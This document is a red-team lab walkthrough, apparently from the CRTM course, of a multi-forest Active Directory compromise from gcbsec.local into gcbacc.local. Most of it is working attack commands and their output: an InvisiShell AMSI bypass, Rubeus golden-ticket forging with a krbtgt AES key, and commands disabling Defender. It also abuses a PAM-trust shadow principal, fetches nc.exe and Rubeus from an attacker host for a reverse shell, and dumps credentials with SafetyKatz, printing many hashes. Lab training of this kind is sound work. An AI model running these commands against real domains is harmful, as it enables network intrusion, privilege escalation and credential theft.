Phase 6 - Section 9
  • Phase - 6 - Section 9

    In Path 6 Section 9 of the CRTM lab, our objective is to exploit a multi-forest Active Directory trust relationship, using a chained attack path spanning three distinct environments. We begin with privileged access on SEC-SYSLOG01, which gives us domain admin capabilities on the SEC-DC environment. This initial position provides a strategic foothold to advance our operation.

    Leveraging the existing trust relationships explicitly depicted in the topology, we pivot from SEC-DC into the next environment, targeting ACC-DC07. Here, our goal is to escalate privileges and secure domain administrator rights on ACC-DC07 by thoroughly enumerating trusts, group memberships, ACLs, and any delegation opportunities available between these two domains.

    Once domain admin rights on ACC-DC07 are established, we focus on lateral movement to achieve local administrator privileges on the critical host, ACC-Data. Gaining local administrative access is essential to extract sensitive credentials or tokens necessary for advancing toward the final target.

    Our ultimate target is the gcbacc.local domain. We must carefully navigate through Kerberos authentication constraints, particularly double-hop issues, ensuring the integrity of credentials while pivoting between environments. Enumeration of privileges, careful exploitation of trust relationships, and advanced delegation or ticket manipulation techniques will be crucial.

    This section concludes by attaining full domain admin control over gcbacc.local. The scenario emphasizes precise trust enumeration, layered privilege escalation, and managing complex authentication scenarios across multiple Active Directory forests.

    We should start by accessing SEC-SYSLOG01 server, It is the host we found on the previous path during our scanning phase and we know that this host is part of gcbsec.local, we have also used this server to compromise the whole gcbsec.local domain. In this can SEC-SYSLOG01 will be out entry point.

    PsExec64.exe \\192.168.144.197 -accepteula -u "sec\syslogagent" -p "Password123" cmd

    InvisiShell

    set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
    
    REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
    REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
    REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "%~dp0InShellProf.dll" /f
    
    powershell
    
    set COR_ENABLE_PROFILING=
    set COR_PROFILER=
    REG DELETE "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f

    Forging a Golden Ticket

    From our previous Path we were able to the DCSync attack on gcbsec.local domain, so let’s use the KRBTGT credentials to forge a Golden Ticket. Since we already have all needed information from the DCSync attack done previously, we can move on. Our next command will be preparing a forged TGT using the krbtgt AES-256 hash, making it valid for the gcbsec.local domain, and allowing authentication via LDAP as the administrator account.

    Domain: gcbsec.local
    Domain SID: S-1-5-21-4056425676-3036975250-1243519898
    Domain Controller: sec-dc.gcbsec.local
    Service Account: sec\krbtgt
    AES256: 431ea6c9bee05ed969f0787cd57c00d1105a20b748511956aa4881732890b9d3
    NTLM-Hash: da6010de93e6e1c94bdd90bb42a9920e

    Importing Rubeus into Target

    Invoke-WebRequest -Uri http://192.168.100.41:443/Rubeus.exe -OutFile "C:Tools\Rubeus.exe" -UseBasicParsing

    OKAY, Now that we have bypassed this AppLocker blocking point, we can simply forge our Golden Ticket by simply requesting the ticket and importing it to the current session.

    Remember that Rubeus.exe must be executed from C:\Tools forlder, otherwise we will face the same block.

    Rubeus.exe golden /user:administrator /aes256:431ea6c9bee05ed969f0787cd57c00d1105a20b748511956aa4881732890b9d3 /ldap /domain:gcbsec.local /sid:S-1-5-21-4056425676-3036975250-1243519898 /printcmd

    Now all we need to do, it simply copy/paste the cmd created by Rubeus and also add the flag /ptt at the end of line, this will tell Rubeus to import this ticket into our current session.

    Rubeus.exe golden /aes256:431EA6C9BEE05ED969F0787CD57C00D1105A20B748511956AA4881732890B9D3 /user:administrator /id:500 /pgid:513 /domain:gcbsec.local /sid:S-1-5-21-4056425676-3036975250-1243519898 /pwdlastset:"5/28/2019 4:01:10 AM" /minpassage:1 /logoncount:104 /netbios:SEC /groups:544,518,519,512,520,513 /dc:SEC-DC.gcbsec.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

    We see no error on the from our last command, so it means that we were able to forget our Golden Ticket and we can now access the gcbsec.local Domain Controller.

    Accessing the DC

    Let’s use WinRS to access the Domain Controller.

    winrs -r:sec-dc.gcbsec.local cmd

    set COR_ENABLE_PROFILING=1
    set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
    
    REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
    REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
    REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "%~dp0InShellProf.dll" /f
    
    powershell
    
    set COR_ENABLE_PROFILING=
    set COR_PROFILER=
    REG DELETE "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f

    Set-MpPreference -DisableRealtimeMonitoring 1; Set-MpPreference -DisableBehaviorMonitoring 1; Set-MpPreference -DisableScriptScanning 1; Set-MpPreference -DisableIntrusionPreventionSystem 1; Set-MpPreference -DisableNetworkProtection 1; Set-MpPreference -SubmitSamplesConsent 2; Set-MpPreference -MAPSReporting 0; Set-MpPreference -PUAProtection 0

    Importing and extracting ADModule

    We can now use ADModule to enumerate Forest Trusts. We should import ADModule to be able to start use that.

    Invoke-WebRequest -Uri http://192.168.100.41:443/ADModule-master.zip -OutFile "C:\ADModule-master.zip" -UseBasicParsing

    Expand-Archive -Path "C:\ADModule-master.zip" -DestinationPath "C:\"

    Import-Module .\Microsoft.ActiveDirectory.Management.dll

    Import-Module .\ActiveDirectory\ActiveDirectory.psd1

    Enumerating Trusts between GCBSEC.LOCAL & GCBACC.LOCAL

    The next step should be the Forest trust enumeration at the Root Forest Level. Let’s start by enumerating the Cross Forest Trusts.

    Get-ADTrust -Filter *

    This output from Get-ADTrust -Filter * reveals a deeper configuration of the trust relationship between gcbsec.local and gcbacc.local. The direction is inbound, meaning gcbacc.local is allowing authentication requests from gcbsec.local. The trust is forest transitive and marked as external (IntraForest is false), confirming it's a cross-forest relationship and not an internal domain-to-domain trust within the same forest.

    SID filtering is disabled (SIDFilteringQuarantined is false and SIDFilteringForestAware is also false), which is critical. This means we can forge tickets with elevated SIDs, such as Domain Admin or Enterprise Admin from gcbacc.local and inject them as part of a Golden Ticket or Golden PAC without being stripped during authentication. This setting significantly reduces defensive boundaries and enables powerful cross-forest abuse techniques like SIDHistory injection or Golden PAC.

    Selective authentication is also false, which is advantageous. It means we don’t need to be explicitly allowed to authenticate on target machines in gcbacc.local as long as the trust exists and the ticket is valid, we can authenticate without additional ACLs granting explicit access. This removes a common hurdle when moving laterally across forests.

    Finally, although TGT delegation is false, this doesn’t impact our ability to forge TGS tickets manually or abuse trust using Golden Ticket-based access. The trust attributes and encryption settings also suggest no constraint preventing us from interacting across the trust with the right crafted tickets. Overall, this trust setup is permissive and ideal for moving from gcbsec.local into gcbacc.local with forged or escalated Kerberos access.

    Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}

    We enumerated the trust relationship from the gcbsec.local domain and confirmed that there is an inbound forest transitive trust from gcbacc.local. The trust is cross-forest, not intra-forest, and does not enforce SID filtering or selective authentication. This means that gcbacc.local accepts Kerberos authentication from gcbsec.local without stripping elevated SIDs, and access doesn’t require explicit permissions. These trust properties allow us to craft Golden Tickets with gcbacc.local admin-level SIDs and authenticate across the forest boundary without restriction. This setup creates a clear path for privilege escalation and lateral movement into gcbacc.local directly from gcbsec.local.

    Shadow Security Principals Enumeration with ADModule

    Let’s now enumerate Shadow Security Principal from our current domain.

    Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl

    We've identified that a PAM trust is configured between gcbsec.local and gcbacc.local through the presence of a Shadow Security Principal. Specifically, we discovered an object named accforest-ShadowEnterpriseAdmin within the Shadow Principal Configuration container. This object has a msDS-ShadowPrincipalSid ending in -519, which corresponds to the Enterprise Admins group in the gcbacc.local forest. This confirms that gcbsec.local can delegate privileged access into gcbacc.local via this shadow principal. Currently, no users are assigned to the member attribute, meaning no one is actively mapped to that role yet. However, if we are able to modify this object or assign a user to it, we can assume cross-forest Enterprise Admin privileges into gcbacc.local, making this a critical escalation point within the PAM trust model.


    Note that gcbacc.local has no DNS entry or trust with our current domain gcbsec.local and we need to use IP address of DC of gcbacc.local to access it.
    Let’s run Get-DnsServerZone command to be able to find the gcbacc.local domain controller.

    Get-DnsServerZone -ZoneName gcbacc.local |fl *

    Our next step should be to enumerate permissions on the ShadowPrincipal object (accforest-ShadowEnterpriseAdmin) using ADModule.

    Get-ACL -Path "AD:\CN=accforest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,$((Get-ADRootDSE).ConfigurationNamingContext)" | Format-List

    We confirmed that the accforest-ShadowEnterpriseAdmin object in gcbsec.local is fully controlled by the SEC\Domain Admins and SEC\Enterprise Admins groups. Since we're operating with forged domain admin privileges in gcbsec.local, we have the necessary rights to modify this Shadow Principal. This allows us to assign our user directly to the object, effectively projecting Enterprise Admin-level privileges into gcbacc.local. Once added, we can forge a Kerberos TGT that includes the shadow SID, enabling us to authenticate as Enterprise Admins across the trust boundary. This gives us full control in gcbacc.local, completing the cross-forest escalation through the PAM trust path.

    We also confirmed that the Shadow Principal object accforest-ShadowEnterpriseAdmin currently has no members and is fully writable by Domain Admins in gcbsec.local. Since we’re operating as the Administrator account with a forged Golden Ticket that grants Domain Admin rights, we’re authorized to modify this object. By adding CN=Administrator,CN=Users,DC=gcbsec,DC=local as a member, we link our account directly to the Shadow Principal. This means we now have a legitimate path to impersonate an Enterprise Admin in gcbacc.local through SID projection. With this membership in place, we can forge a new Golden Ticket that includes the Shadow SID and use it to access high-privilege resources across the trust boundary.

    Let’s now add the Administrator of gcbsec.local (our current user) to accforest-ShadowEnterpriseAdmin object in gcbsec.local .
    Set-ADObject -Identity "CN=accforest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=gcbsec,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=gcbsec,DC=local"}

    Set-ADObject -Identity "CN=accforest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=gcbsec,DC=local" -Add @{'member'="CN=syslogagent,CN=Users,DC=gcbsec,DC=local"}

    Let’s now check and confirm that we were able to add the Adminstrator into accforest-ShadowEnterpriseAdmin object.

    Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl

    That confirms it, our Administrator account from gcbsec.local is now officially mapped to the accforest-ShadowEnterpriseAdmin object. This gives us a legitimate and recognized association to the Enterprise Admins group in gcbacc.local through the Shadow Security Principal mechanism.

    From here, we’re ready to forge a new Golden Ticket that includes the Shadow SID S-1-5-21-3331877400-209796306-1317730910-519. This will allow us to project full Enterprise Admin privileges across the trust and begin direct access or lateral movement within gcbacc.local.

    Invoke-WebRequest -Uri http://192.168.100.41:443/Rubeus.exe -OutFile "C:Tools\Rubeus.exe" -UseBasicParsing

    .\Rubeus.exe golden /user:administrator /aes256:431ea6c9bee05ed969f0787cd57c00d1105a20b748511956aa4881732890b9d3 /ldap /domain:gcbsec.local /sid:S-1-5-21-4056425676-3036975250-1243519898 /sids:S-1-5-21-3331877400-209796306-1317730910-519 /printcmd

    C:\Rubeus.exe golden /aes256:431EA6C9BEE05ED969F0787CD57C00D1105A20B748511956AA4881732890B9D3 /user:administrator /id:500 /pgid:513 /domain:gcbsec.local /sid:S-1-5-21-4056425676-3036975250-1243519898 /pwdlastset:"5/28/2019 4:01:10 AM" /minpassage:1 /logoncount:114 /netbios:SEC /groups:544,518,519,512,520,513,0 /sids:S-1-5-21-3331877400-209796306-1317730910-519 /dc:SEC-DC.gcbsec.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

    winrs -r:sec-dc.gcbsec.local cmd

    For some unknown reason, I was not able to abuse this PAM Trust with the Administrator.

    Set-Item WSMan:\localhost\Client\TrustedHosts * -Force

    $password = 'Password123' | ConvertTo-SecureString -AsPlainText -Force

    $cred = New-Object System.Management.Automation.PSCredential("sec\syslogagent", $password)

    Invoke-Command -ComputerName '192.168.79.1' -Credential $cred -ScriptBlock {whoami /all}

    That’s a solid win, we successfully abused PAM Trust using a shadow security principal and pivoted into the target domain controller with syslogagent. Now, let’s demystify why this worked with syslogagent and not with the forged Administrator golden ticket, even though both were added to the shadow object.

    Disable Defender on 192.168.97.1

    Invoke-Command -ComputerName '192.168.79.1' -Credential $cred -ScriptBlock {Set-MpPreference -DisableRealTimeMonitoring $True; Get-MpPreference | Select-Object DisableRealTimeMonitoring}

    This remote access is super unstable, so it is better if we get a more stable reverse shell. Let’s import nc.exe into our target and get a reverse shell to out attacking host.

    Invoke-Command -ComputerName '192.168.79.1' -Credential $cred -ScriptBlock {Invoke-WebRequest -Uri http://192.168.100.41:443/nc.exe -OutFile "C:\nc.exe" -UseBasicParsing}

    Invoke-Command -ComputerName '192.168.79.1' -Credential $cred -ScriptBlock { sc.exe start ReverseShell}

    Credentials Dumping

    Importing SafetyKatz.exe to 192.168.79.1

    Invoke-WebRequest -Uri http://192.168.100.41:443/SafetyKatz.exe -OutFile "C:\SafetyKatz.exe" -UseBasicParsing

    Now that we have imported SafetyKatz, we can do the DCSync attack and get the KRBTGT from GCBACC.LOCAL.

    • DCSync KRBTGT

      C:\SafetyKatz.exe "privilege::debug" "lsadump::dcsync /user:acc\krbtgt" "exit"

      C:\SafetyKatz.exe "privilege::debug" "lsadump::dcsync /user:acc\krbtgt" "exit"
      
        .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
       .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
       ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
       ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
       '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
        '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
      
      mimikatz(commandline) # privilege::debug
      Privilege '20' OK
      
      mimikatz(commandline) # lsadump::dcsync /user:acc\krbtgt
      [DC] 'gcbacc.local' will be the domain
      [DC] 'acc-dc07.gcbacc.local' will be the DC server
      [DC] 'acc\krbtgt' will be the user account
      [rpc] Service  : ldap
      [rpc] AuthnSvc : GSS_NEGOTIATE (9)
      
      Object RDN           : krbtgt
      
      ** SAM ACCOUNT **
      
      SAM Username         : krbtgt
      Account Type         : 30000000 ( USER_OBJECT )
      User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
      Account expiration   :
      Password last change : 5/26/2019 4:46:51 AM
      Object Security ID   : S-1-5-21-3331877400-209796306-1317730910-502
      Object Relative ID   : 502
      
      Credentials:
        Hash NTLM: 424db28087e04ff82439041d5a733d09
          ntlm- 0: 424db28087e04ff82439041d5a733d09
          lm  - 0: fd7e39f8b7987eeef73c2a28eea2434d
      
      Supplemental Credentials:
      * Primary:NTLM-Strong-NTOWF *
          Random Value : eafabcb0b07b290abbb022680adefba2
      
      * Primary:Kerberos-Newer-Keys *
          Default Salt : GCBACC.LOCALkrbtgt
          Default Iterations : 4096
          Credentials
            aes256_hmac       (4096) : d36fd4c2561078f2f7230d81fa0b32719bc440224c2cd4e531e278e6272748b7
            aes128_hmac       (4096) : 41ec47d1b8e8b36155edc84a50390ef5
            des_cbc_md5       (4096) : b9d9bc925b6d5798
      
      * Primary:Kerberos *
          Default Salt : GCBACC.LOCALkrbtgt
          Credentials
            des_cbc_md5       : b9d9bc925b6d5798
      
      * Packages *
          NTLM-Strong-NTOWF
      
      * Primary:WDigest *
          01  d6d0c5cf3fd58bb02f3a1d9e1a9359fb
          02  4e7d7c1338160d639b4c7eb2db7f5fd7
          03  cda247a0e201dd2b57a81b8777a92e4f
          04  d6d0c5cf3fd58bb02f3a1d9e1a9359fb
          05  4e7d7c1338160d639b4c7eb2db7f5fd7
          06  7e911b48164a4a3f3d5eb13b2fa2c166
          07  d6d0c5cf3fd58bb02f3a1d9e1a9359fb
          08  6e887e73dfb65f25e08dfa8866df82e2
          09  6e887e73dfb65f25e08dfa8866df82e2
          10  e25f5075294a18501821053b1d15b893
          11  710a5a3cb65b23852b7918dbeedbc20f
          12  6e887e73dfb65f25e08dfa8866df82e2
          13  27c4a63ea9fa3a18e8fbd7a697507969
          14  710a5a3cb65b23852b7918dbeedbc20f
          15  985dbea5da5a18d615da979119d17943
          16  985dbea5da5a18d615da979119d17943
          17  475f6ae1de481e579026915004bd80bb
          18  ccb3ca6573ad4582bcf73b8727dd7be7
          19  c4cf9dd54678c51d667793f45da32c57
          20  803c411a7bafa48495371dc55328f0f2
          21  bc608a93f4a4c50afb2b4df2a7299733
          22  bc608a93f4a4c50afb2b4df2a7299733
          23  f69db03788a6c4eb4c0ddd911f21fe14
          24  e4b52afd0655b79b5cef6529dc039a22
          25  e4b52afd0655b79b5cef6529dc039a22
          26  f6a54816a57cc7ab0dec0c06b3550ff4
          27  b46234cf39e9c0d3f2647929ee09fa25
          28  5f2fad6cbfb515b57d44f26d53c1a37d
          29  f018c3a94e5d512b953b12a2692933e3
      
      
      mimikatz(commandline) # exit
    • sekurlsa::logonpasswords
      C:\SafetyKatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
      
        .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
       .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
       ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
       ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
       '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
        '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
      
      mimikatz(commandline) # privilege::debug
      Privilege '20' OK
      
      mimikatz(commandline) # sekurlsa::logonpasswords
      
      Authentication Id : 0 ; 1374712 (00000000:0014f9f8)
      Session           : RemoteInteractive from 2
      User Name         : Administrator
      Domain            : ACC
      Logon Server      : ACC-DC07
      Logon Time        : 2/15/2024 4:55:25 AM
      SID               : S-1-5-21-3331877400-209796306-1317730910-500
              msv :
               [00000003] Primary
               * Username : Administrator
               * Domain   : ACC
               * NTLM     : 70d6b3cabbe11f8f0b06a7380e7a5005
               * SHA1     : 7e997adad2de641f701fbbe89a43d07fceface88
               * DPAPI    : 630c248ce91c9def1db22183a404049a
              tspkg :
              wdigest :
               * Username : Administrator
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : Administrator
               * Domain   : GCBACC.LOCAL
               * Password : (null)
              ssp :
              credman :
      
      Authentication Id : 0 ; 120693 (00000000:0001d775)
      Session           : Interactive from 2
      User Name         : DWM-2
      Domain            : Window Manager
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:11 AM
      SID               : S-1-5-90-0-2
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 120215 (00000000:0001d597)
      Session           : Interactive from 2
      User Name         : DWM-2
      Domain            : Window Manager
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:11 AM
      SID               : S-1-5-90-0-2
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 118398 (00000000:0001ce7e)
      Session           : Interactive from 2
      User Name         : UMFD-2
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:10 AM
      SID               : S-1-5-96-0-2
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 118358 (00000000:0001ce56)
      Session           : Interactive from 2
      User Name         : UMFD-2
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:10 AM
      SID               : S-1-5-96-0-2
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 31224 (00000000:000079f8)
      Session           : Interactive from 0
      User Name         : UMFD-0
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:00 AM
      SID               : S-1-5-96-0-0
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
              ssp :
              credman :
      
      Authentication Id : 0 ; 27474 (00000000:00006b52)
      Session           : UndefinedLogonType from 0
      User Name         : (null)
      Domain            : (null)
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:40:56 AM
      SID               :
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
              kerberos :
              ssp :
              credman :
      
      Authentication Id : 0 ; 52645 (00000000:0000cda5)
      Session           : Interactive from 1
      User Name         : DWM-1
      Domain            : Window Manager
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:02 AM
      SID               : S-1-5-90-0-1
              msv :
               [00000003] Primary
               * Username : ACC-DC07$
               * Domain   : ACC
               * NTLM     : b337f797ea0ada49d01db9f8c1fe0255
               * SHA1     : 0b02db293a8bf55e63e6006e28d3e550bce86a2f
               * DPAPI    : 0b02db293a8bf55e63e6006e28d3e550
              tspkg :
              wdigest :
               * Username : ACC-DC07$
               * Domain   : ACC
               * Password : (null)
              kerberos :
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
